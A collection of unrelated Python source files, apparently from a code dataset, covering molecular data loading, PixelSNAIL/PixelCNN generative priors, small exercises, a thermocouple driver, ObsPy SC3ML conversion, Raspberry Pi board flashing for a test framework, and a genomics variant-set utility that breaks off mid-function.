def __init__(self, metadata: List[Dict[str, str]], padding_dim: int = 528, condition_dim: int = 256):
"""
:param metadata: Metadata.
:param padding_dim: Padding size for all distance vectors and conditions.
:param condition_dim: Dimensionality of the hidden size for the condition matrix.
"""
super(Dataset, self).__init__()
self.metadata = metadata
self.padding_dim = padding_dim
self.condition_dim = condition_dim
def __len__(self) -> int:
return len(self.metadata)
def __getitem__(self, idx: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
"""
:param idx: # of data item to retrieve.
:return: Padded distance vector, condition matrix, and # of pairwise distances in the molecule.
"""
# Load the pairwise distance matrix
_, data = distmat_to_vec(self.metadata[idx]['path'])
dist_vec = torch.from_numpy(data)
# noinspection PyTypeChecker
dist_vec = dist_vec.type(torch.float32)
# Compute the number of pairwise distances before padding
num_dist = torch.tensor(dist_vec.shape[0])
# Pad the pairwise distances vector
padding = torch.zeros(self.padding_dim)
padding[:dist_vec.shape[0]] = dist_vec
dist_vec = padding
# Load the condition matrix
condition = np.load(self.metadata[idx]['condition'])
condition = torch.from_numpy(condition)
# noinspection PyTypeChecker
condition = condition.type(torch.float32)
# Pad the condition matrix
padding = torch.zeros([self.padding_dim, self.condition_dim])
padding[0:condition.shape[0], :] = condition
condition = padding
return dist_vec, condition, num_dist
def __repr__(self) -> str:
return '{}({})'.format(self.__class__.__name__, len(self))
| StarcoderdataPython |
3487832 | import matplotlib.pyplot as plt
from __future__ import print_function
import numpy as np
import umap
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
import torch.optim as optim
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torchvision.utils import make_grid
from tqdm import tqdm
from math import sqrt
from vqvae import VQVAE
def preprocess(x, n_bits):
# """ preprosses discrete latents space [0, 2**n_bits) to model space [-1,1]; if size of the codebook ie n_embeddings = 512 = 2**9 -> n_bit=9 """
# 1. convert data to float
# 2. normalize to [0,1] given quantization
# 3. shift to [-1,1]
return x.float().div(2 ** n_bits - 1).mul(2).add(-1)
def deprocess(x, n_bits):
# """ deprocess x from model space [-1,1] to discrete latents space [0, 2**n_bits) where 2**n_bits is size of the codebook """
# 1. shift to [0,1]
# 2. quantize to n_bits
# 3. convert data to long
return x.add(1).div(2).mul(2 ** n_bits - 1).long()
# ==============
# PixelSNAIL top prior
# ==============
def down_shift(x):
return F.pad(x, (0, 0, 1, 0))[:, :, :-1, :]
def right_shift(x):
return F.pad(x, (1, 0))[:, :, :, :-1]
def concat_elu(x):
return F.elu(torch.cat([x, -x], dim=1))
class Conv2d(nn.Conv2d):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
nn.utils.weight_norm(self)
class DownConv(Conv2d):
def forward(self, x):
Hk, Wk = self.kernel_size
x = F.pad(x, ((Wk - 1) // 2, (Wk - 1) // 2, Hk - 1, 0))
return super().forward(x)
class DownRightConv(Conv2d):
def forward(self, x):
Hk, Wk = self.kernel_size
x = F.pad(x, (Wk - 1, 0, Hk - 1, 0))
return super().forward(x)
class GatedResLayer(nn.Module):
def __init__(self, conv, n_channels, kernel_size, drop_rate=0, shortcut_channels=None, n_cond_classes=None, relu_fn=concat_elu):
super().__init__()
self.relu_fn = relu_fn
self.c1 = conv(2*n_channels, n_channels, kernel_size)
if shortcut_channels:
self.c1c = Conv2d(2*shortcut_channels, n_channels, kernel_size=1)
if drop_rate > 0:
self.dropout = nn.Dropout(drop_rate)
self.c2 = conv(2*n_channels, 2*n_channels, kernel_size)
if n_cond_classes:
self.proj_y = nn.Linear(n_cond_classes, 2*n_channels)
def forward(self, x, a=None, y=None):
c1 = self.c1(self.relu_fn(x))
if a is not None: # shortcut connection if auxiliary input 'a' is given
c1 = c1 + self.c1c(self.relu_fn(a))
c1 = self.relu_fn(c1)
if hasattr(self, 'dropout'):
c1 = self.dropout(c1)
c2 = self.c2(c1)
if y is not None:
c2=c2.transpose(1,3)
c2 += self.proj_y(y)[:,:,None]
c2=c2.transpose(1,3)
a, b = c2.chunk(2,1)
out = x + a * torch.sigmoid(b)
return out
def causal_attention(k, q, v, mask, nh, drop_rate, training):
B, dq, H, W = q.shape
_, dv, _, _ = v.shape
# split channels into multiple heads, flatten H,W dims and scale q; out (B, nh, dkh or dvh, HW)
flat_q = q.reshape(B, nh, dq // nh, H, W).flatten(3) * (dq // nh) ** -0.5
flat_k = k.reshape(B, nh, dq // nh, H, W).flatten(3)
flat_v = v.reshape(B, nh, dv // nh, H, W).flatten(3)
logits = torch.matmul(flat_q.transpose(2, 3), flat_k) # (B,nh,HW,dq) dot (B,nh,dq,HW) = (B,nh,HW,HW)
logits = F.dropout(logits, p=drop_rate, training=training, inplace=True)
logits = logits.masked_fill(mask == 0, -1e10)
weights = F.softmax(logits, -1)
attn_out = torch.matmul(weights, flat_v.transpose(2, 3)) # (B,nh,HW,HW) dot (B,nh,HW,dvh) = (B,nh,HW,dvh)
attn_out = attn_out.transpose(2, 3) # (B,nh,dvh,HW)
return attn_out.reshape(B, -1, H, W) # (B,dv,H,W)
class AttentionGatedResidualLayer(nn.Module):
def __init__(self, n_channels, n_background_ch, n_res_layers, n_cond_classes, drop_rate, nh, dq, dv,
attn_drop_rate):
super().__init__()
# attn params
self.nh = nh
self.dq = dq
self.dv = dv
self.attn_drop_rate = attn_drop_rate
self.input_gated_resnet = nn.ModuleList([
*[GatedResLayer(DownRightConv, n_channels, (2, 2), drop_rate, None, n_cond_classes) for _ in
range(n_res_layers)]])
self.in_proj_kv = nn.Sequential(
GatedResLayer(Conv2d, 2 * n_channels + n_background_ch, 1, drop_rate, None, n_cond_classes),
Conv2d(2 * n_channels + n_background_ch, dq + dv, 1))
self.in_proj_q = nn.Sequential(
GatedResLayer(Conv2d, n_channels + n_background_ch, 1, drop_rate, None, n_cond_classes),
Conv2d(n_channels + n_background_ch, dq, 1))
self.out_proj = GatedResLayer(Conv2d, n_channels, 1, drop_rate, dv, n_cond_classes)
def forward(self, x, background, attn_mask, y=None):
ul = x
for m in self.input_gated_resnet:
ul = m(ul, y=y)
kv = self.in_proj_kv(torch.cat([x, ul, background], 1))
k, v = kv.split([self.dq, self.dv], 1)
q = self.in_proj_q(torch.cat([ul, background], 1))
attn_out = causal_attention(k, q, v, attn_mask, self.nh, self.attn_drop_rate, self.training)
return self.out_proj(ul, attn_out)
class PixelSNAIL(nn.Module):
def __init__(self, input_dims, n_channels, n_res_layers, n_out_stack_layers, n_cond_classes, n_bits,
attn_n_layers=4, attn_nh=8, attn_dq=16, attn_dv=128, attn_drop_rate=0, drop_rate=0.5, **kwargs):
super().__init__()
H, W = input_dims[2]
# init background
background_v = ((torch.arange(H, dtype=torch.float) - H / 2) / 2).view(1, 1, -1, 1).expand(1, 1, H, W)
background_h = ((torch.arange(W, dtype=torch.float) - W / 2) / 2).view(1, 1, 1, -1).expand(1, 1, H, W)
self.register_buffer('background', torch.cat([background_v, background_h], 1))
# init attention mask over current and future pixels
attn_mask = torch.tril(torch.ones(1, 1, H * W, H * W),
diagonal=-1).byte() # 1s below diagonal -- attend to context only
self.register_buffer('attn_mask', attn_mask)
# input layers for `up` and `up and to the left` pixels
self.ul_input_d = DownConv(2, n_channels, kernel_size=(1, 3))
self.ul_input_dr = DownRightConv(2, n_channels, kernel_size=(2, 1))
self.ul_modules = nn.ModuleList([
*[AttentionGatedResidualLayer(n_channels, self.background.shape[1], n_res_layers, n_cond_classes, drop_rate,
attn_nh, attn_dq, attn_dv, attn_drop_rate) for _ in range(attn_n_layers)]])
self.output_stack = nn.Sequential(
*[GatedResLayer(DownRightConv, n_channels, (2, 2), drop_rate, None, n_cond_classes) \
for _ in range(n_out_stack_layers)])
self.output_conv = Conv2d(n_channels, 2 ** n_bits, kernel_size=1)
def forward(self, x, y=None):
# add channel of ones to distinguish image from padding later on
x = F.pad(x, (0, 0, 0, 0, 0, 1), value=1)
ul = down_shift(self.ul_input_d(x)) + right_shift(self.ul_input_dr(x))
for m in self.ul_modules:
ul = m(ul, self.background.expand(x.shape[0], -1, -1, -1), self.attn_mask, y)
ul = self.output_stack(ul)
return self.output_conv(F.elu(ul)).unsqueeze(2) # out (B, 2**n_bits, 1, H, W)
# =============
# PixelCNN bottom prior
# =============
def pixelcnn_gate(x):
a, b = x.chunk(2, 1)
return torch.tanh(a) * torch.sigmoid(b)
class MaskedConv2d(nn.Conv2d):
def __init__(self, mask_type, *args, **kwargs):
self.mask_type = mask_type
super().__init__(*args, **kwargs)
def apply_mask(self):
H, W = self.kernel_size
self.weight.data[:, :, H // 2 + 1:, :].zero_() # mask out rows below the middle
self.weight.data[:, :, H // 2, W // 2 + 1:].zero_() # mask out center row pixels right of middle
if self.mask_type == 'a':
self.weight.data[:, :, H // 2, W // 2] = 0 # mask out center pixel
def forward(self, x):
self.apply_mask()
return super().forward(x)
class GatedResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, n_cond_channels, drop_rate):
super().__init__()
self.residual = (in_channels == out_channels)
self.drop_rate = drop_rate
self.v = nn.Conv2d(in_channels, 2 * out_channels, kernel_size, padding=kernel_size // 2) # vertical stack
self.h = nn.Conv2d(in_channels, 2 * out_channels, (1, kernel_size),
padding=(0, kernel_size // 2)) # horizontal stack
self.v2h = nn.Conv2d(2 * out_channels, 2 * out_channels, kernel_size=1) # vertical to horizontal connection
self.h2h = nn.Conv2d(out_channels, out_channels, kernel_size=1, bias=False) # horizontal to horizontal
if n_cond_channels:
self.in_proj_y = nn.Conv2d(n_cond_channels, 2 * out_channels, kernel_size=1)
if self.drop_rate > 0:
self.dropout_h = nn.Dropout(drop_rate)
def apply_mask(self):
self.v.weight.data[:, :, self.v.kernel_size[0] // 2:, :].zero_() # mask out middle row and below
self.h.weight.data[:, :, :,
self.h.kernel_size[1] // 2 + 1:].zero_() # mask out to the right of the central column
def forward(self, x_v, x_h, y):
self.apply_mask()
# projection of y if included for conditional generation (cf paper section 2.3 -- added before the pixelcnn_gate)
proj_y = self.in_proj_y(y)
# vertical stack
x_v_out = self.v(x_v)
x_v2h = self.v2h(x_v_out) + proj_y
x_v_out = pixelcnn_gate(x_v_out)
# horizontal stack
x_h_out = self.h(x_h) + x_v2h + proj_y
x_h_out = pixelcnn_gate(x_h_out)
if self.drop_rate:
x_h_out = self.dropout_h(x_h_out)
x_h_out = self.h2h(x_h_out)
# residual connection
if self.residual:
x_h_out = x_h_out + x_h
return x_v_out, x_h_out
def extra_repr(self):
return 'residual={}, drop_rate={}'.format(self.residual, self.drop_rate)
class PixelCNN(nn.Module):
def __init__(self, n_channels, n_out_conv_channels, kernel_size, n_res_layers, n_cond_stack_layers, n_cond_classes,
n_bits,
drop_rate=0, **kwargs):
super().__init__()
# conditioning layers (bottom prior conditioned on class labels and top-level code)
self.in_proj_y = nn.Linear(n_cond_classes, 2 * n_channels)
self.in_proj_h = nn.ConvTranspose2d(1, n_channels, kernel_size=4, stride=2,
padding=1) # upsample top codes to bottom-level spacial dim
self.cond_layers = nn.ModuleList([
GatedResLayer(partial(Conv2d, padding=kernel_size // 2), n_channels, kernel_size, drop_rate, None,
n_cond_classes) \
for _ in range(n_cond_stack_layers)])
self.out_proj_h = nn.Conv2d(n_channels, 2 * n_channels,
kernel_size=1) # double channels top apply pixelcnn_gate
# pixelcnn layers
self.input_conv = MaskedConv2d('a', 1, 2 * n_channels, kernel_size=7, padding=3)
self.res_layers = nn.ModuleList([
GatedResidualBlock(n_channels, n_channels, kernel_size, 2 * n_channels, drop_rate) for _ in
range(n_res_layers)])
self.conv_out1 = nn.Conv2d(n_channels, 2 * n_out_conv_channels, kernel_size=1)
self.conv_out2 = nn.Conv2d(n_out_conv_channels, 2 * n_out_conv_channels, kernel_size=1)
self.output = nn.Conv2d(n_out_conv_channels, 2 ** n_bits, kernel_size=1)
def forward(self, x, h=None, y=None):
# conditioning inputs -- h is top-level codes; y is class labels
h = self.in_proj_h(h)
for l in self.cond_layers:
h = l(h, y=y)
h = self.out_proj_h(h)
y = self.in_proj_y(y)[:, :, None]
y = y.transpose(1, 3)
x = pixelcnn_gate(self.input_conv(x) + h + y)
x_v, x_h = x, x
for l in self.res_layers:
x_v, x_h = l(x_v, x_h, y)
out = pixelcnn_gate(self.conv_out1(x_h))
out = pixelcnn_gate(self.conv_out2(out))
return self.output(out).unsqueeze(2) # (B, 2**n_bits, 1, H, W) | StarcoderdataPython |
6597961 | <filename>collatz.py
# <NAME>
# Program that asks a user to input any positive integer
# and outputs the successive values of the following calculations:
x = int(input("Please enter a positive integer: "))
while True:
if x < 0:
print("Please start the program again and enter POSITIVE integer!")
break
elif x == 1:
break
elif x % 2 == 0:
x = int(x / 2)
print (x, end=" ")
else:
x = int (x * 3 + 1)
print (x, end=" ") | StarcoderdataPython |
1669881 | import Adafruit_GPIO.SPI as SPI
import Adafruit_MAX31855.MAX31855 as MAX31855
class TempMAX31855:
numSensor = 0
def __init__(self, spi, tempSensorId,clk=None, cs=None, do=None):
if spi == "hardware":
# Raspberry Pi hardware SPI configuration.
SPI_PORT = 0
SPI_DEVICE = 0
self.sensor = MAX31855.MAX31855(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))
elif spi == "gpio":
self.sensor = MAX31855.MAX31855(clk, cs, do)
else:
print "ABORT!!!"
self.tempSensorId = tempSensorId
self.sensorNum = TempMAX31855.numSensor
TempMAX31855.numSensor += 1
print("Constructing MAX31855 sensor %s"%(tempSensorId))
def readTempC(self):
temp_C = self.sensor.readTempC()
return temp_C
| StarcoderdataPython |
3277615 | """
https://www.codewars.com/kata/576bb71bbbcf0951d5000044/train/python
Given an array of ints, return array where 1st el is the count of positives, the 2nd el is sum of negatives.
"""
def count_positives_sum_negatives(arr):
return [len([num for num in arr if num > 0]), sum([num for num in arr if num < 0])] if arr else arr
def count_positives_sum_negatives2(arr):
"""
More space efficient, but not as concise as above
"""
if not arr:
return arr
count = 0
total = 0
for num in arr:
if num > 0:
count += 1
else:
total += num
return [count, total]
| StarcoderdataPython |
1942638 | <reponame>earthinversion/Fnet_IRIS_data_automated_download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
sc3ml events read and write support.
:author:
EOST (École et Observatoire des Sciences de la Terre)
:copyright:
The ObsPy Development Team (<EMAIL>)
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
import io
import os
import re
from lxml import etree
from obspy.io.quakeml.core import Pickler, Unpickler, _xml_doc_from_anything
from obspy.io.seiscomp.core import validate as validate_sc3ml
SCHEMA_VERSION = ['0.5', '0.6', '0.7', '0.8', '0.9']
def _read_sc3ml(filename, id_prefix='smi:org.gfz-potsdam.de/geofon/'):
"""
Read a 0.9 SC3ML file and returns a :class:`~obspy.core.event.Catalog`.
An XSLT file is used to convert the SC3ML file to a QuakeML file. The
catalog is then generated using the QuakeML module.
.. warning::
This function should NOT be called directly, it registers via the
the :meth:`~obspy.core.event.catalog.Catalog.write` method of an
ObsPy :class:`~obspy.core.event.catalog.Catalog` object, call this
instead.
:type filename: str
:param filename: SC3ML file to be read.
:type id_prefix: str
:param id_prefix: ID prefix. SC3ML does not enforce any particular ID
restriction, this ID prefix allows to convert the IDs to a well
formatted QuakeML ID. You can modify the default ID prefix with the
reverse DNS name of your institute.
:rtype: :class:`~obspy.core.event.Catalog`
:return: An ObsPy Catalog object.
.. rubric:: Example
>>> from obspy import read_events
>>> cat = read_events('/path/to/iris_events.sc3ml')
>>> print(cat)
2 Event(s) in Catalog:
2011-03-11T05:46:24.120000Z | +38.297, +142.373
2006-09-10T04:26:33.610000Z | +9.614, +121.961
"""
sc3ml_doc = _xml_doc_from_anything(filename)
match = re.match(
r'{http://geofon\.gfz-potsdam\.de/ns/seiscomp3-schema/([-+]?'
r'[0-9]*\.?[0-9]+)}', sc3ml_doc.tag)
try:
version = match.group(1)
except AttributeError:
raise ValueError("Not a SC3ML compatible file or string.")
else:
if version not in SCHEMA_VERSION:
message = ("Can't read SC3ML version %s, ObsPy can deal with "
"versions [%s].") % (
version, ', '.join(SCHEMA_VERSION))
raise ValueError(message)
xslt_filename = os.path.join(os.path.dirname(__file__), 'data',
'sc3ml_%s__quakeml_1.2.xsl' % version)
transform = etree.XSLT(etree.parse(xslt_filename))
quakeml_doc = transform(sc3ml_doc,
ID_PREFIX=etree.XSLT.strparam(id_prefix))
return Unpickler().load(io.BytesIO(quakeml_doc))
def _write_sc3ml(catalog, filename, validate=False, verbose=False,
event_removal=False, **kwargs): # @UnusedVariable
"""
Write a SC3ML file. Since a XSLT file is used to write the SC3ML file from
a QuakeML file, the catalog is first converted in QuakeML.
.. warning::
This function should NOT be called directly, it registers via the
the :meth:`~obspy.core.event.catalog.Catalog.write` method of an
ObsPy :class:`~obspy.core.event.catalog.Catalog` object, call this
instead.
:type catalog: :class:`~obspy.core.event.catalog.Catalog`
:param catalog: The ObsPy Catalog object to write.
:type filename: str or file
:param filename: Filename to write or open file-like object.
:type validate: bool
:param validate: If True, the final SC3ML file will be validated against
the SC3ML schema file. Raises an AssertionError if the validation
fails.
:type verbose: bool
:param verbose: Print validation error log if True.
:type event_deletion: bool
:param event_removal: If True, the event elements will be removed. This can
be useful to associate origins with scevent when injecting SC3ML file
into seiscomp.
"""
nsmap_ = getattr(catalog, "nsmap", {})
quakeml_doc = Pickler(nsmap=nsmap_).dumps(catalog)
xslt_filename = os.path.join(os.path.dirname(__file__), 'data',
'quakeml_1.2__sc3ml_0.9.xsl')
transform = etree.XSLT(etree.parse(xslt_filename))
sc3ml_doc = transform(etree.parse(io.BytesIO(quakeml_doc)))
# Remove events
if event_removal:
for event in sc3ml_doc.xpath("//*[local-name()='event']"):
event.getparent().remove(event)
if validate and not validate_sc3ml(io.BytesIO(sc3ml_doc), verbose=verbose):
raise AssertionError("The final SC3ML file did not pass validation.")
# Open filehandler or use an existing file like object
try:
with open(filename, 'wb') as fh:
fh.write(sc3ml_doc)
except TypeError:
filename.write(sc3ml_doc)
| StarcoderdataPython |
6661251 | # Copyright (c) 2017
#
# All rights reserved.
#
# This file is distributed under the Clear BSD license.
# The full text can be found in LICENSE in the root directory.
import ipaddress
import os
import pexpect
from boardfarm.lib import common
from . import openwrt_router
class RPI(openwrt_router.OpenWrtRouter):
"""Raspberry pi board device class with OpenWrtRouter OS installed."""
model = "rpi3"
wan_iface = "erouter0"
lan_iface = "brlan0"
lan_network = ipaddress.IPv4Network(u"10.0.0.0/24")
lan_gateway = ipaddress.IPv4Address(u"10.0.0.1")
uprompt = ["U-Boot>"]
uboot_eth = "sms0"
uboot_ddr_addr = "0x1000000"
uboot_net_delay = 0
fdt = "uImage-bcm2710-rpi-3-b.dtb"
fdt_overlay = "uImage-pi3-disable-bt-overlay.dtb"
# can't get u-boot to work without a delay
delaybetweenchar = 0.05
# allowed open ports (starting point)
wan_open_ports = ["22", "8080", "8087", "8088", "8090"]
flash_meta_booted = True
cdrouter_config = "configs/cdrouter-rdkb.conf"
def flash_uboot(self, uboot):
"""Flash the Raspberry pi board with the Universal Bootloader image.
In this case it's flashing the vfat partition of the bootload.
Need to have that image u-boot and serial turned on via dtoverlay
for things to work after flashing.
:param uboot: Indicates the absolute location of the file to be used to flash.
:type uboot: string
"""
common.print_bold("\n===== Flashing bootloader (and u-boot) =====\n")
filename = self.prepare_file(uboot)
size = self.tftp_get_file_uboot(self.uboot_ddr_addr, filename)
self.sendline("mmc part")
# get offset of ext (83) partition after a fat (0c) partition
self.expect(r"\r\n\s+\d+\s+(\d+)\s+(\d+).*0c( Boot)?\r\n")
start = hex(int(self.match.groups()[0]))
if int(size) != int(self.match.groups()[1]) * 512:
raise Exception("Partition size does not match, refusing to flash")
self.expect(self.uprompt)
count = hex(int(size / 512))
self.sendline("mmc erase %s %s" % (start, count))
self.expect(self.uprompt)
self.sendline("mmc write %s %s %s" %
(self.uboot_ddr_addr, start, count))
self.expect(self.uprompt, timeout=120)
self.reset()
self.wait_for_boot()
self.setup_uboot_network()
def flash_rootfs(self, ROOTFS):
"""Flash the Raspberry pi board with the ROOTFS (which in general is a patch update on the firmware).
:param ROOTFS: Indicates the absolute location of the file to be used to flash.
:type ROOTFS: string
"""
common.print_bold("\n===== Flashing rootfs =====\n")
filename = self.prepare_file(ROOTFS)
size = self.tftp_get_file_uboot(self.uboot_ddr_addr,
filename,
timeout=220)
self.sendline("mmc part")
# get offset of ext (83) partition after a fat (0c) partition
self.expect(r"0c( Boot)?\r\n\s+\d+\s+(\d+)\s+(\d+).*83\r\n")
start = hex(int(self.match.groups()[-2]))
sectors = int(self.match.groups()[-1])
self.expect(self.uprompt)
# increase partition size if required
if int(size) > (sectors * 512):
self.sendline("mmc read %s 0 1" % self.uboot_ddr_addr)
self.expect(self.uprompt)
gp2_sz = int(self.uboot_ddr_addr, 16) + int("0x1da", 16)
self.sendline("mm 0x%08x" % gp2_sz)
self.expect("%08x: %08x ?" % (gp2_sz, sectors))
# pad 100M
self.sendline("0x%08x" % int((int(size) + 104857600) / 512))
self.sendcontrol("c")
self.sendcontrol("c")
self.expect(self.uprompt)
self.sendline("echo FOO")
self.expect_exact("echo FOO")
self.expect_exact("FOO")
self.expect(self.uprompt)
self.sendline("mmc write %s 0 1" % self.uboot_ddr_addr)
self.expect(self.uprompt)
self.sendline("mmc rescan")
self.expect(self.uprompt)
self.sendline("mmc part")
self.expect(self.uprompt)
count = hex(int(size / 512))
self.sendline("mmc erase %s %s" % (start, count))
self.expect(self.uprompt)
self.sendline("mmc write %s %s %s" %
(self.uboot_ddr_addr, start, count))
self.expect_exact("mmc write %s %s %s" %
(self.uboot_ddr_addr, start, count))
self.expect(self.uprompt, timeout=480)
def flash_linux(self, KERNEL):
"""Flash the Raspberry pi board with a file downloaded using TFTP protocol.
:param KERNEL: Indicates the absoulte location of the file to be used to flash.
:type KERNEL: string
"""
common.print_bold("\n===== Flashing linux =====\n")
filename = self.prepare_file(KERNEL)
self.tftp_get_file_uboot(self.uboot_ddr_addr, filename)
self.kernel_file = os.path.basename(KERNEL)
self.sendline("fatwrite mmc 0 %s %s $filesize" %
(self.kernel_file, self.uboot_ddr_addr))
self.expect(self.uprompt)
def flash_meta(self, META, wan, lan):
"""Flash an openembedded-core to RPi. (Flashes a combine signed image using TFTP).
:param META: Indicates the absoulte location of the file to be used to flash.
:type META: string
:param wan: Indicates the wan device to be used
:type wan: object
:param lan: Indicates the lan device to be used
:type lan: object
"""
print("\n===== Updating entire SD card image =====\n")
# must start before we copy as it erases files
wan.start_tftp_server()
filename = self.prepare_file(META,
tserver=wan.config["ipaddr"],
tport=wan.config.get("port", "22"))
wan_ip = wan.get_interface_ipaddr("eth1")
self.sendline("ping -c1 %s" % wan_ip)
self.expect_exact(
"1 packets transmitted, 1 packets received, 0% packet loss")
self.expect(self.prompt)
self.sendline("cd /tmp")
self.expect(self.prompt)
self.sendline(" tftp -g -r %s 10.0.1.1" % filename)
self.expect(self.prompt, timeout=500)
self.sendline("systemctl isolate rescue.target")
if 0 == self.expect([
"Give root password for maintenance",
"Welcome Press Enter for maintenance",
"Press Enter for maintenance",
]):
self.sendline("password")
else:
self.sendline()
self.expect_exact("sh-3.2# ")
self.sendline("cd /tmp")
self.expect_exact("sh-3.2# ")
self.sendline("mount -no remount,ro /")
self.expect_exact("sh-3.2# ")
self.sendline("dd if=$(basename %s) of=/dev/mmcblk0 && sync" %
filename)
self.expect(pexpect.TIMEOUT, timeout=120)
self.reset()
self.wait_for_boot()
# we need to update bootargs, should be doing this at build time
self.boot_linux()
self.wait_for_linux()
def wait_for_linux(self):
"""Reboot the device waits for the menu.
This method enables Device.DeviceInfo.X_RDKCENTRAL-COM_CaptivePortalEnable before rebooting.
"""
super(RPI, self).wait_for_linux()
self.sendline("cat /etc/issue")
if 0 == self.expect(["OpenEmbedded"] + self.prompt):
self.routing = False
self.wan_iface = "eth0"
self.lan_iface = None
self.expect(self.prompt)
self.sendline(
"dmcli eRT getv Device.DeviceInfo.X_RDKCENTRAL-COM_CaptivePortalEnable"
)
if (self.expect([
" type: bool, value: false",
"dmcli: not found"
] + self.prompt) > 1):
self.sendline(
"dmcli eRT setv Device.DeviceInfo.X_RDKCENTRAL-COM_CaptivePortalEnable bool false"
)
self.expect(self.prompt)
self.sendline("reboot")
super(RPI, self).wait_for_linux()
def boot_linux(self, rootfs=None, bootargs=""):
"""Boots the RPi's OS.
:param rootfs: Indicates the rootsfs image path if needs to be loaded (parameter to be used at later point), defaults to None.
:type rootfs: NA
:param bootargs: Indicates the boot parameters to be specified if any (parameter to be used at later point), defaults to empty string "".
:type bootargs: string
"""
common.print_bold("\n===== Booting linux for %s =====" % self.model)
self.sendline("fdt addr $fdt_addr")
self.expect(self.uprompt)
self.sendline("fdt get value bcm_bootargs /chosen bootargs")
self.expect(self.uprompt)
self.sendline('setenv bootargs "$bcm_bootargs %s"' % bootargs)
self.expect(self.uprompt)
self.sendline(
"setenv bootcmd 'fatload mmc 0 ${kernel_addr_r} %s; bootm ${kernel_addr_r} - ${fdt_addr}; booti ${kernel_addr_r} - ${fdt_addr}'"
% getattr(self, "kernel_file", "uImage"))
self.expect(self.uprompt)
self.sendline("saveenv")
self.expect(self.uprompt)
self.sendline("boot")
# Linux handles serial better ?
self.delaybetweenchar = None
| StarcoderdataPython |
3230720 | """
Utility methods for manipulating variant sets.
"""
from collections import defaultdict
import re
from django.core.exceptions import ObjectDoesNotExist
import pyinter
from main.constants import UNDEFINED_STRING
from main.models import ExperimentSample
from main.models import Variant
from main.models import VariantSet
from main.models import VariantToVariantSet
from variants.materialized_variant_filter import lookup_variants
from variants.melted_variant_schema import MELTED_SCHEMA_KEY__ES_UID
from variants.melted_variant_schema import MELTED_SCHEMA_KEY__UID
MODIFY_VARIANT_SET_MEMBERSHIP__ADD = 'add'
MODIFY_VARIANT_SET_MEMBERSHIP__REMOVE = 'remove'
VALID_ACTIONS = set([
MODIFY_VARIANT_SET_MEMBERSHIP__ADD,
MODIFY_VARIANT_SET_MEMBERSHIP__REMOVE
])
# Lenient regex that matches uids.
UID_REGEX = re.compile('\w+')
def update_variant_in_set_memberships(ref_genome, uid_data_str_list,
action, variant_set_uid):
"""Modifies the memberships of the given list of variant/sample objects
in the given VariantSet.
Args:
ref_genome: Used to verify ownership of contained
entities. Clients of this method must confirm that the requestor
has permissions to modify this ReferenceGenome.
uid_data_str_list: A list of strings, each of one of two possible forms:
* "variant_uid"
* "variant_uid, sample_uid"
action: The action to perform.
variant_set_uid: The set to add the variant to.
Expected exceptions are caught and reported in the response object.
Returns:
A dictionary containing information about how the request was handled.
This is ultimately returned to the UI to show the client a message.
Contains the following keys:
* alert_type: Type of message. Either 'info', 'error', or 'warn'.
* alert_msg: Additional information shown to the user.
"""
validation_result = _initial_validation(
uid_data_str_list, action)
if validation_result['alert_type'] == 'error':
return validation_result
# Make sure that the VariantSet is valid.
try:
variant_set = VariantSet.objects.get(
reference_genome=ref_genome,
uid=variant_set_uid)
except ObjectDoesNotExist:
return {
'alert_type': 'error',
'alert_msg': 'Variant Set does not exist or insufficient permissions.'
}
# Convert to object interface to help clarify further processing.
grouped_uid_dict_list = _convert_pair_list_into_object_list(
uid_data_str_list)
# Get helper objects for the query.
(variant_uid_to_obj_map, sample_uid_to_obj_map) = (
_get_cached_uid_to_object_maps(ref_genome, grouped_uid_dict_list))
# Perform modification.
if action == MODIFY_VARIANT_SET_MEMBERSHIP__ADD:
_perform_add(grouped_uid_dict_list, variant_set,
variant_uid_to_obj_map, sample_uid_to_obj_map)
else: # action == MODIFY_VARIANT_SET_MEMBERSHIP__REMOVE
_perform_remove(grouped_uid_dict_list, variant_set,
variant_uid_to_obj_map, sample_uid_to_obj_map)
# These actions invalidate the materialized view.
ref_genome.invalidate_materialized_view()
# Return success response if we got here.
return {
'alert_type': 'info',
'alert_msg': 'success'
}
def update_variant_in_set_memberships__all_matching_filter(ref_genome,
action, variant_set_uid, filter_string, is_melted):
"""Updates VariantSet membership for all matching filter.
"""
query_args = {
'filter_string': filter_string,
'is_melted': is_melted,
}
lookup_variant_result = lookup_variants(query_args, ref_genome)
variant_list = lookup_variant_result.result_list
# Convert the variant result into the form that the update function
# requires, list of '<variant_uid>' or '<variant_uid>,<sample_uid>'.
uid_data_str_list = []
for row in variant_list:
data_str = row[MELTED_SCHEMA_KEY__UID]
if (MELTED_SCHEMA_KEY__ES_UID in row and
not isinstance(row[MELTED_SCHEMA_KEY__ES_UID], list) and
not row[MELTED_SCHEMA_KEY__ES_UID] is None):
data_str += ',' + row[MELTED_SCHEMA_KEY__ES_UID]
uid_data_str_list.append(data_str)
return update_variant_in_set_memberships(
ref_genome, uid_data_str_list, action, variant_set_uid)
def add_variants_to_set_from_bed(sample_alignment, bed_dataset):
"""
Given a bed with feature names and a corresponding sample alignment,
create new variant sets for every unique feature name and assign variants
to that fall within these features to the new sets.
E.g. BED:
...
NC_000913 223514 223534 POOR_MAPPING_QUALITY
NC_000913 223542 223734 NO_COVERAGE
NC_000913 223751 224756 POOR_MAPPING_QUALITY
...
Add variants in 223542-223734 to NO_COVERAGE
Add variants in 223751-224756 and 223514-223534 to POOR_MAPPING_QUALITY
"""
# Read in the bed file
bed_dataset_fn = bed_dataset.get_absolute_location()
reference_genome = sample_alignment.alignment_group.reference_genome
experiment_sample = sample_alignment.experiment_sample
# 1. Create a dictionary of disjoint intervals, recursive defaultdict
feature_disj_intervals = defaultdict(
lambda: defaultdict(pyinter.IntervalSet))
variants_to_add = defaultdict(list)
with open(bed_dataset_fn) as bed_dataset_fh:
for i, line in enumerate(bed_dataset_fh):
try:
chrom, start, end, feature = line.strip().split('\t')
# make a new interval from start to end
new_ivl = pyinter.closedopen(int(start), int(end))
# add new ivl to old ivls
